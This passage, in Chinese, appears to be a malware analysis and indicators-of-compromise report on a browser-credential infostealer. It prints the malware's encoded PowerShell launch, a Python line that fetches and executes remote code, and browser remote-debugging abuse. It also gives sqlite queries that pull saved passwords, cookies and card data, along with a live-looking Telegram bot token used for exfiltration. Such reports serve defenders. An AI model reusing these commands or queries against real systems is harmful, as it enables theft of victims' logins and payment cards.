使用此 bat 的 hash 進行搜尋,可以找到 [a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage](https://tria.ge/250103-r2z4fsskfq/behavioral1)
可以看到 cmdline 的檔名會不斷變換
#### network
在這篇報告可以看到有進行網路活動 [a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage](https://tria.ge/250103-r2z4fsskfq/behavioral2)
但僅有紀錄 DNS
---
## IoC
以下資訊僅針對此病毒與受害電腦上所出現之特徵
### 攻擊指令
1. `powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....`
1. `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"`
2. `taskkill /F /IM browser.exe`
3. `browser.exe --remote-debugging-port=9222 --restore-lastest-session --user-data-dir={path} --profile-directory={profile} --remote-allow-origins=* --headless --window-size=1,1 --disable-gpu --no-sandbox`
### 存取檔案
1. All_Passwords.txt
2. login_db
3. cards_db
4. Temp\[TW_某IP] 電腦名稱.zip
5. Facebook_Cookies.txt
6. profiles.ini
7. logins.json
9. key4.db
10. cookies.sqlite
11. Startup\WindowsSecurity.lnk
- `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"`
13. C:\Users\Public\ChromeApplication
- DLLs\
- Lib\
- definitions.py
- python310.dll
- synaptics.exe(pythonw.exe 3.10.11)
- vcruntime140.dll
### 連線 IP or URL
1. `http://localhost:9222/json`
2. `https://api.telegram.org/bot{TOKEN_BOT}/sendDocument`
- 149.154.167.220:443
4. `http://ip-api.com/json/?fields=8195`
- 208.95.112.1:80
5. `.facebook.com`
- adsmanager
- graph
- mbasic
- business
6. `https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint`
- 172.65.251.78:443
### TG info
1. TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'
2. CHAT_ID_NEW='-1002426006531'
3. CHAT_ID_RESET='-1002489276039'
4. https://t[.]me/Xmeta
### sqlite 查詢語法
1. `SELECT item1, item2 FROM metadata;`
2. `SELECT a11, a102 FROM nssPrivate WHERE a102 = b'\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01';`
3. `SELECT action_url, username_value, password_value FROM logins`
4. `SELECT host, path, name, value, isSecure, isHttpOnly, expiry FROM moz_cookies`
5. `SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards`
### header
`headers = {'authority': 'adsmanager.facebook.com','accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','accept-language': 'vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5','cache-control': 'max-age=0','sec-ch-prefers-color-scheme': 'dark','sec-ch-ua': '"Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"','sec-ch-ua-full-version-list': '"Chromium";v="112.0.5615.140", "Google Chrome";v="112.0.5615.140", "Not:A-Brand";v="99.0.0.0"','sec-ch-ua-mobile': '?0','sec-ch-ua-platform': '"Windows"','sec-ch-ua-platform-version': '"15.0.0"','sec-fetch-dest': 'document','sec-fetch-mode': 'navigate','sec-fetch-site': 'same-origin','sec-fetch-user': '?1','upgrade-insecure-requests': '1','user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36','viewport-width': '794'}`
Sign in with Wallet
Connect another wallet